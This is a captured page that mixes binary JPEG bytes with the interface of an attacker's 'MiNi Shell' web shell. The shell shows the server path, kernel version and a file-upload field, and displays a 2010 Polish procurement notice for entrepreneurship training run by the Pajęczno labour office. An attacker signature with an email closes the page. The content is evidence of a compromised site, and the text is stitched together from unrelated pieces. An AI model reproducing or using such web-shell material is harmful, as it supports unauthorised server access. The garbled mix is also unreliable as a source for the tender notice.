JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100423/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100423/96063-N-2010.html

<p class="kh_header"><b>Pajęczno: Usługa szkolenia w zakresie:
Podstawy małej przedsiębiorczości</b><br>
<b>Numer ogłoszenia: 96063 - 2010; data zamieszczenia: 23.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Pajęcznie , ul. 1 Maja 65, 98-330 Pajęczno, woj. łódzkie, tel. 034 3112882, faks 034 312992.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.pajeczno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa szkolenia w zakresie:
Podstawy małej przedsiębiorczości.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa szkolenia:
PODSTAWY MAŁEJ PRZEDSIĘBIORCZOŚCI

Celem szkolenia jest udzielenie wsparcia osobom bezrobotnym zainteresowanym otrzymaniem jednorazowo środków na rozpoczęcie działalności gospodarczej. W ramach szkolenia, uczestnicy kursu powinni uzyskać informacje na temat: form organizacyjno-prawnych prowadzenia działalności gospodarczej, czynności formalnych związanych z jej podejmowaniem, elementarnych zasad prowadzenia działalności gospodarczej w kontekście obowiązujących regulacji prawnych, zasad i źródeł finansowania działalności oraz indywidualną pomoc w wypełnieniu dokumentów aplikacyjnych związanych z otrzymaniem przez osobę bezrobotną jednorazowo środków na podjęcie działalności gospodarczej 
ze środków finansowych Funduszu Pracy i Europejskiego Funduszu Społecznego.
2.	Usługa szkolenia będzie realizowana w 2010 roku, w dziesięciu grupach - po 10 osób każda.
3.	W całym okresie realizacji usługi, szkoleniem objętych zostanie 100 osób bezrobotnych skierowanych przez Zamawiającego /dziesięć grup 10 osobowych/.
4.	Wymagane terminy wykonania zamówienia:
1)	I grupa 		- od 17.05.2010 do 28.05.2010
2)	II grupa	- od 07.06.2010 do 18.06.2010
3)	III grupa	- od 21.06.2010 do 02.07.2010
4)	IV grupa	- od 05.07.2010 do 16.07.2010
5)	V grupa	- od 19.07.2010 do 30.07.2010
6)	VI grupa 	- od 02.08.2010 do 13.08.2010
7)	VII grupa	- od 16.08.2010 do 27.08.2010
8)	VIII grupa 	- od 06.09.2010 do 17.09.2010
9)	IX grupa 	- od 04.10.2010 do 15.10.2010
10)	X grupa	- od 18.10.2010 do 29.10.2010   
5.	Zamawiający dopuszcza możliwość zmiany terminów szkoleń poszczególnych grup szkoleniowych, tylko w przypadku wystąpienia okoliczności, które wyszły na jaw w chwili dokonywania oceny złożonych ofert.
6.	Rozpoczęcie realizacji usługi powinno nastąpić po podpisaniu z Zamawiającym umowy
o organizację usługi szkolenia.
7.	Zajęcia na kursie powinny odbywać się codziennie, w dni robocze od poniedziałku do piątku,
w godzinach od 08.00 do 15.00.
8.	Łączna liczba godzin zajęć na kursie nie powinna być mniejsza niż 60 godzin zegarowych dla każdej 10 osobowej grupy/liczba godzin w tygodniu nie mniej niż 30 godzin zegarowych/.
9.	Usługa szkolenia powinna zostać przeprowadzona w całości na terenie miasta Pajęczno.
10.	Wykonawca zobowiązany jest posiadać wpis do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na swą siedzibę /zgodnie z art. 20 ust. 1 ustawy z dnia 20 kwietnia 2004 roku o promocji zatrudnienia
i instytucjach rynku pracy (Dz. U. z 2008 r. nr 69 poz. 415 ze zm.)
11.	Wykonawca jest zobowiązany ubezpieczyć uczestników szkolenia od następstw nieszczęśliwych wypadków powstałych w trakcie szkolenia, w drodze do miejsca szkolenia 
i z powrotem, z wyjątkiem osób posiadających z tego tytułu prawo do stypendium.
12.	Szkolenie winno zakończyć się egzaminem i wydaniem zaświadczeń
o jego ukończeniu, zgodnie z rozporządzeniem MEiN z dnia 03.02.2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31 poz. 216).
13.	Wykonawca winien przedstawić pisemne informacje wskazane w programie szkolenia sporządzonym zgodnie z Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 
2 marca 2007r. w sprawie szczegółowych warunków prowadzenia przez publiczne służby zatrudnienia usług rynku pracy (Dz. U. Nr 47, poz.315) według załącznika nr 7 do SIWZ. 

14.  Wykonawca zobowiązany jest do przedstawienia w formie pisemnej informacji dotyczącej dobrania poziomu wiedzy i doświadczenia wykładowców do tematyki szkolenia.
15. Wykonawca winien przedstawić pisemną informację potwierdzającą  przeprowadzenie kursu         zgodnie z  ustaloną liczbą godzin, bez względu na ewentualne przerwy (choroby wykładowców, święta, dni wolne, awarie itp.);
16.  Zamawiający zobowiązuje Wykonawcę do prowadzenia dokumentacji przebiegu szkolenia 
tj. m.in.: dziennika zajęć edukacyjnych zawierającego listę obecności, wymiar godzin 
i tematy zajęć edukacyjnych; protokołu z egzaminu (jeżeli został przeprowadzony); rejestru wydawanych zaświadczeń, ankiet oceny szkolenia i wykładowcy dla uczestników  szkolenia (załącznik nr 11 do SIWZ);
17. Wykonawca w trakcie trwania szkolenia winien zapewnić uczestnikom szkolenia warunki uwzględniające bezpieczne i higieniczne warunki pracy i nauki. Dlatego też pomieszczenie,
w którym realizowane będą zajęcia szkoleniowe winno być bezwzględnie dostosowane 
do prowadzenia zajęć dla grupy minimum 10-cio osobowej. Wykonawca musi dla każdego uczestnika szkolenia zapewnić miejsce siedzące, stolik / ławkę bądź krzesło z przystawką umożliwiającą swobodne sporządzanie notatek. Zapewnienie odpowiedniego wyposażenia tej sali: np. flipchart lub tablica klasyczna lub magnetyczna oraz sprzęt audiowizualny.
18.	 Wykonawca w opisie warunków szkolenia winien dokładnie podać miejsce realizacji zajęć
  i w sposób szczegółowy opisać wyposażenie sali, w której prowadzone będą zajęcia    
 dydaktyczne. W przypadku zajęć praktycznych należy wymienić sprzęt i urządzenia, jakie  
 będą wykorzystywane podczas zajęć oraz w jakich ilościach. Wykonawca zobowiązany jest 
 do przeprowadzenia wśród uczestników szkolenia oceny merytorycznej i technicznej 
 przebiegu szkolenia m.in. na podstawie formularza ankiety oceniającej przekazanej przez 
 Zamawiającego jak również przedstawienia jej wyników (zestawienie i analiza). Niezależnie 
 od tego Wykonawca winien przedstawić Zamawiającemu opis, w jaki sposób będzie 
 prowadził własny nadzór wewnętrzny służący podnoszeniu jakości prowadzonego szkolenia 
 oraz kto personalnie będzie odpowiadał za jego realizację.
19.Wykonawca przed rozpoczęciem szkolenia jest zobowiązany zapoznać uczestników
     z jego szczegółowym programem oraz przekazać im harmonogram realizowanych zajęć.  
     Każdy uczestnik szkolenia otrzyma materiały dydaktyczne w tym co najmniej materiały 
     biurowe w postaci środków piszących i notesów.
20. Wykonawca zobowiązany jest do indywidualizacji kształcenia poprzez prowadzenie stałej  
 oceny postępów poszczególnych uczestników szkolenia i zwiększenia pomocy wobec osób 
 napotykających trudności w procesie nauczania. W programie szkolenia w punkcie 
 dotyczącym sposobu sprawdzenia efektów szkolenia Wykonawca m.in. winien precyzyjnie 
 określić, w jaki sposób zamierza spełnić niniejsze zobowiązania..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usłudze stanowiącej przedmiot niniejszego zamówienia, z podaniem dat wykonania, ich wartości, ilości przeszkolonych osób, odbiorców oraz załączenia co najmniej 3 dokumentów potwierdzających, że te usługi zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje Wykonawca wraz z informacją o podstawie dysponowania tymi zasobami.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz
z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakres wykonywanych przez nich czynności oraz informację o podstawie do dysponowania tymi osobami (załącznik nr 5). 
Należy przedstawić co najmniej następującą kadrę: 
-  2 osoby z wykształceniem wyższym z zakresu nauk ekonomicznych;
-	2 osoby z wykształceniem wyższym z zakresu prawa;
-	2 osoby z wykształceniem wyższym posiadające doświadczenie w prowadzeniu 
w firmach księgowości rozliczeniowej m.in. z ZUS, Urzędem Skarbowym.


		W każdej grupie poszczególne części programu szkolenia, powinien prowadzić specjalista ze swojej dziedziny. Ponadto do wykazu kadry powinny być dołączone oświadczenia każdego z wykładowców, iż wyrażają zgodę na prowadzenie tego szkolenia we wskazanym w SIWZ terminie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 oraz art. 24 
ust. 1 ustawy z dnia 29.01.2004 r. Prawo zamówień publicznych (Dz. U. z 2007 r. Nr 223 poz. 1655 z późn. zm.).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony formularz ofertowy - załącznik nr 1 do SIWZ.
2.	Zaświadczenie o wpisie do Rejestru Instytucji Szkoleniowych aktualne na 2010 r. zgodnie
z Rozporządzeniem Ministra Gospodarki i Pracy z dnia 27 października 2004 r. w sprawie rejestru instytucji szkoleniowych (Dz. U. z 2004 r. Nr 236, poz. 2365.)
3.	Program szkolenia zgodny z Rozdziałem I SIWZ będący integralną częścią umowy.
4.	Wykaz osób uprawnionych do reprezentowania Wykonawcy w postępowaniu o zamówienie publiczne i do podejmowania zobowiązań w imieniu wykonawcy (imię i nazwisko, funkcja/ stanowisko).
5.	Preliminarz kosztów szkolenia. Preliminarz kosztów szkolenia powinien zawierać kalkulację kosztów szkolenia dla grupy 100 osobowej oraz pojedynczej grupy 10 osobowej, kalkulację kosztu jednostkowego /koszt szkolenia 1 osoby/ oraz kalkulację kosztu osobogodziny szkolenia według załącznika nr 9 i 10.
6.	Wzór dokumentu (wydawanego zaświadczenia) potwierdzającego ukończenie szkolenia
i uzyskanie kwalifikacji zgodnego z Rozdziałem I SIWZ.
7.	Wskazanie sposobu zaangażowania się instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób (załącznik wg indywidualnego wzoru Wykonawcy);
8.	Pisemne zobowiązanie do ubezpieczenia uczestników szkolenia od następstw nieszczęśliwych wypadków wskazanych na imiennym wykazie przekazanym przez Zamawiającego,
9.	Harmonogram szkolenia dla każdej grupy szkoleniowej (zawierający daty i godziny, nazwisko prowadzącego zajęcia oraz tematy zajęć)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Doświadczenie Wykonawcy w przeprowadzaniu usług szkoleniowych z zakresu przedsiębiorczości w okresie 3 lat wstecz - 25</li>
<li>3 - Kwalifikacje kadry dydaktycznej - 10</li>
<li>4 - Dostosowanie jakości pomieszczenia oraz wyposażenie w sprzęt, pomoce dydaktyczne i środki dydaktyczne do potrzeb szkolenia z uwzględnieniem bhp - 10</li>
<li>5 - Posiadanie przez instytucję szkoleniową certyfikatu jakości usług - 5</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup.pajeczno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Pajęcznie
ul. 1- Maja 65
98-330 Pajęczno
województwo łódzkie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.05.2010 godzina 09:00, miejsce: Powiatowy Urząd Pracy w Pajęcznie
ul. 1- Maja 65
98-330 Pajęczno
województwo łódzkie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com